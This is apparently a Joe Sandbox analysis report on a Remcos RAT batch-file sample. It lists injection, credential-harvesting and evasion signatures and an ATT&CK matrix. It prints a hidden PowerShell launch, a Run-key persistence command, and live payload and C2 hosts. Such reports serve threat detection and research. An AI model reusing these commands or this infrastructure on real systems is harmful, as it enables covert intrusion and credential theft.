              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3476797B push ebx; retf 2_2_00007FFD3476796A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_045DC890 pushfd ; ret 5_2_045DC899
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2806 push ecx; ret 9_2_21BD2819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414060 push eax; ret 18_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414060 push eax; ret 18_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414039 push ecx; ret 18_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4

              Boot Survival

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface:
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface:
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Forsnakket154
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_004047CB
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5530
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4412
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7330
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2350
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6952Thread sleep count: 3797 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep count: 797 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep time: -2391000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep count: 5168 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep time: -15504000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3797 delay: -5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_21BD10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD6580 FindFirstFileExA,9_2_21BD6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: powershell.exe, 00000005.00000002.2410836893.000000000725E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv6E57.tmp.15.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: powershell.exe, 00000002.00000002.2263530956.00000244208E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_16-33997
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0443D6CC LdrInitializeThunk,5_2_0443D6CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21BD60E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,15_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD4AB4 mov eax, dword ptr fs:[00000030h]9_2_21BD4AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD724E GetProcessHeap,9_2_21BD724E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_21BD2B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21BD2639

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara matchFile source: amsi64_2912.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3B20000
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2933 cpuid 9_2_21BD2933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_21BD2264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,16_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B

              Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: ESMTPPassword | 16_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword | 16_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword | 16_2_00402DB3
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5932, type: MEMORYSTR

              Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-MC4T64
Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques are listed per tactic column; a number in square brackets is the signature count shown next to that technique in the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [1]; Native API [11]; Command and Scripting Interpreter [22]; PowerShell [2]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scripting [1]; DLL Side-Loading [1]; Registry Run Keys / Startup Folder [11]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [412]; Registry Run Keys / Startup Folder [11]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [31]; Access Token Manipulation [1]; Process Injection [412]
Credential Access: OS Credential Dumping [1]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [3]; System Information Discovery [27]; Security Software Discovery [31]; Virtualization/Sandbox Evasion [31]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Local System [1]; Clipboard Data [2]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [213]; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph

Behavior Graph ID: 1539161 | Sample: LTEXSP 5634 HISP9005 ST MSD... | Startdate: 22/10/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts: pikolee.duckdns.org (Uses dynamic DNS services); plieltd.top; geoplugin.net
Signatures on the sample: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

Process tree:
• powershell.exe [Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures]
  • msiexec.exe [pikolee.duckdns.org 143.244.46.150, ports 49881, 49892, 51525, COGENT-174US, United States; geoplugin.net 178.237.33.50, ports 49893, 80, ATOM86-ASATOM86NL, Netherlands; Detected Remcos RAT; Tries to steal Mail credentials (via file registry); Maps a DLL or memory area into another process]
    • msiexec.exe [Tries to harvest and steal browser information (history, passwords, etc)]
    • msiexec.exe
    • cmd.exe
      • conhost.exe
      • reg.exe
    • 2 other processes
  • conhost.exe
• cmd.exe [Suspicious powershell command line found]
  • powershell.exe [plieltd.top 104.21.56.189, ports 443, 49710, 49846, CLOUDFLARENETUS, United States; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell creates an autostart link]
    • conhost.exe
  • conhost.exe

Antivirus Detection

Source | Detection | Scanner | Label | Link
LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat | 5% | ReversingLabs | |
No Antivirus matches for the remaining categories
URL Reputation

Source | Detection | Scanner | Label | Link
http://www.imvu.comr | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
http://www.imvu.com | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://www.ebuddy.com | 0% | URL Reputation | safe |
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
plieltd.top | 104.21.56.189 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
pikolee.duckdns.org | 143.244.46.150 | true | true | | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://plieltd.top/dUEhUdoBD66.bin | false | | unknown
https://plieltd.top/Kvalificeredes.qxd | false | | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
pikolee.duckdns.org | true | | unknown
IP               Domain                Country         ASN    ASN Name            Malicious
104.21.56.189    plieltd.top           United States   13335  CLOUDFLARENETUS     false
143.244.46.150   pikolee.duckdns.org   United States   174    COGENT-174US        true
178.237.33.50    geoplugin.net         Netherlands     8455   ATOM86-ASATOM86NL   false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539161
Start date and time: 2024-10-22 09:39:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winBAT@22/12@3/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 160
• Number of non-executed functions: 287
Cookbook Comments:
• Found application associated with file extension: .bat
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2912 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6776 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
Time      Type             Description
03:40:02  API Interceptor  87x Sleep call for process: powershell.exe modified
03:41:16  API Interceptor  4321316x Sleep call for process: msiexec.exe modified
09:40:34  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Forsnakket154 %Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)
